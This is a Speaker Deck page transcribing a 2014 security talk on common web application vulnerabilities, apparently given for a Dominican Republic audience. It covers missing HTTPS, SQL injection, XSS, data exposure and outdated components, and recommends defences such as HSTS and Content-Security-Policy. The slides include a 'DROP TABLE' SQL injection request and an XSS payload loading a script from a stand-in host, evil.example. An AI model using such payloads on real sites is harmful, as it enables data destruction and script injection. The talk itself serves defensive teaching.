Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
There Is No Silver Bullet
Search
Harley Watson
November 29, 2014
Programming
0
900
There Is No Silver Bullet
Harley Watson
November 29, 2014
Tweet
Share
More Decks by Harley Watson
See All by Harley Watson
paper tickets > smartcards, probably.
unlobito
0
7.5k
one, two step
unlobito
0
750
What's in your pocket? (BSides Manchester)
unlobito
0
960
sorry, we're cash only. (securi-tay)
unlobito
1
1.1k
Sorry, we're cash only. (hacksoc)
unlobito
0
100
There Is No Silver Bullet (Español)
unlobito
0
160
Other Decks in Programming
See All in Programming
PostgreSQLのRow Level SecurityをPHPのORMで扱う Eloquent vs Doctrine #phpcon #track2
77web
2
300
既存デザインを変更せずにタップ領域を広げる方法
tahia910
1
240
PHPで始める振る舞い駆動開発(Behaviour-Driven Development)
ohmori_yusuke
2
180
都市をデータで見るってこういうこと PLATEAU属性情報入門
nokonoko1203
1
570
なんとなくわかった気になるブロックテーマ入門/contents.nagoya 2025 6.28
chiilog
1
190
技術同人誌をMCP Serverにしてみた
74th
0
290
『自分のデータだけ見せたい!』を叶える──Laravel × Casbin で複雑権限をスッキリ解きほぐす 25 分
akitotsukahara
1
510
Google Agent Development Kit でLINE Botを作ってみた
ymd65536
2
160
Railsアプリケーションと パフォーマンスチューニング ー 秒間5万リクエストの モバイルオーダーシステムを支える事例 ー Rubyセミナー 大阪
falcon8823
4
930
すべてのコンテキストを、 ユーザー価値に変える
applism118
2
760
Go1.25からのGOMAXPROCS
kuro_kurorrr
1
800
DroidKnights 2025 - 다양한 스크롤 뷰에서의 영상 재생
gaeun5744
3
320
Featured
See All Featured
The Web Performance Landscape in 2024 [PerfNow 2024]
tammyeverts
8
670
Music & Morning Musume
bryan
46
6.6k
Responsive Adventures: Dirty Tricks From The Dark Corners of Front-End
smashingmag
252
21k
The Language of Interfaces
destraynor
158
25k
We Have a Design System, Now What?
morganepeng
53
7.7k
Creating an realtime collaboration tool: Agile Flush - .NET Oxford
marcduiker
30
2.1k
RailsConf 2023
tenderlove
30
1.1k
How to Think Like a Performance Engineer
csswizardry
24
1.7k
Writing Fast Ruby
sferik
628
61k
Reflections from 52 weeks, 52 projects
jeffersonlam
351
20k
Art, The Web, and Tiny UX
lynnandtonic
299
21k
Adopting Sorbet at Scale
ufuk
77
9.4k
Transcript
there is no silver bullet Henri Watson
Which vulnerabili.es commonly affect web applica.ons in the
Dominican Republic?
No HTTPS
Using HTTPS won’t cost you an arm and a
leg.
The current proposal for HTTP/2.0 requires TLS.
If you decide to use HTTPS, also use Strict-‐Transport-‐Security
and ssllabs.com/ssltest
SQL Injec.ons
GET /tracker?order=12345”; DROP TABLE orders;-‐-‐ SELECT * FROM
orders WHERE order = “12345”; DROP TABLE orders;-‐-‐” AND status = “pending” Request from the client to the server Request from the webserver to the database
None
None
None
Authen.ca.on Implementa.on Mistakes
None
None
Cross-‐Site Scrip.ng (XSS)
GET /hi?name=<script src=“hep://evil.example/ l33thax.js”></script> Hello, <script src=“hep://evil.example/ l33thax.js”></script>!
Request from the client to the server Reply from the server to the client
Content-‐Security-‐Policy
Exposure of Sensi.ve Data
None
Using Components With Known Vulnerabili.es
Mailing Lists • bugtraq hep://www.securityfocus.com/archive/1 • debian-‐security-‐announce
heps://lists.debian.org/debian-‐security-‐announce/ • fulldisclosure hep://nmap.org/mailman/lis.nfo/fulldisclosure
Mailing Lists •
[email protected]
heps://hepd.apache.org/lists.html#hep-‐announce • nginx-‐announce
hep://mailman.nginx.org/mailman/lis.nfo/nginx-‐ announce • php-‐announce hep://php.net/mailing-‐lists.php
None
Customer Service
None
Why is there no “silver bullet”?
Informa.on security is a constant investment.
Heartbleed
By placing your users’ informa.on at risk, you also
risk ruining your company’s reputa.on.
Thanks! @henriwatson
[email protected]
heps://henriwatson.com/talks/silverbullet